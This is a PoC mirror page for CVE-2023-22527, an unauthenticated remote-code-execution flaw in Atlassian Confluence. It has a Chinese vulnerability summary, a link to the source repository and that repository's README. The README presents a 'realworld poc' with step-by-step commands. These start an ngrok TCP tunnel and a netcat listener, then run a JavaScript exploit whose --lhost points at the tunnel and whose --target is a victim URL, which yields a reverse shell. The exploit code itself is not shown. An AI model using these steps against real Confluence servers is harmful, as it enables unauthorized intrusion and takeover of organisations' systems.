CVE-2023-22527 PoC — Atlassian Confluence 安全漏洞

Source

https://github.com/VNCERT-CC/CVE-2023-22527-confluence

Associated Vulnerability

Title:Atlassian Confluence 安全漏洞 (CVE-2023-22527)
Description:Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件，也可以用于构建企业WiKi。 Atlassian Confluence Data Center and Server存在安全漏洞，该漏洞源于存在模板注入漏洞，允许未经身份验证的攻击者在受影响的实例上实现远程代码执行。

Description

[Confluence] CVE-2023-22527 realworld poc

Readme

# CVE-2023-22527-confluence
[Confluence] CVE-2023-22527 realworld poc

# Usage
## Download bun
https://github.com/oven-sh/bun/releases

## Start ngrok
```
ngrok tcp 4444
```

## Listen localhost 4444
```
nc -nvlp 4444
```

## Run exploit
```
bun exploit-CVE-2023-22527.js --lhost 0.tcp.ap.ngrok.io --lport 12169 --target https://xxx/
```

## Result
![image](https://github.com/VNCERT-CC/CVE-2023-22527-confluence/assets/8877695/716a9df2-3154-4672-9410-86ba87971798)
![image](https://github.com/VNCERT-CC/CVE-2023-22527-confluence/assets/8877695/1a2d7711-24dc-4837-8e49-21687ea4f6be)

File Snapshot


 [4.0K]  /data/pocs/4fd9659479f59a70dbcd2b1d3cbd7e03dfd04075
├── [3.6K]  exploit-CVE-2023-22527.js
└── [ 583]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!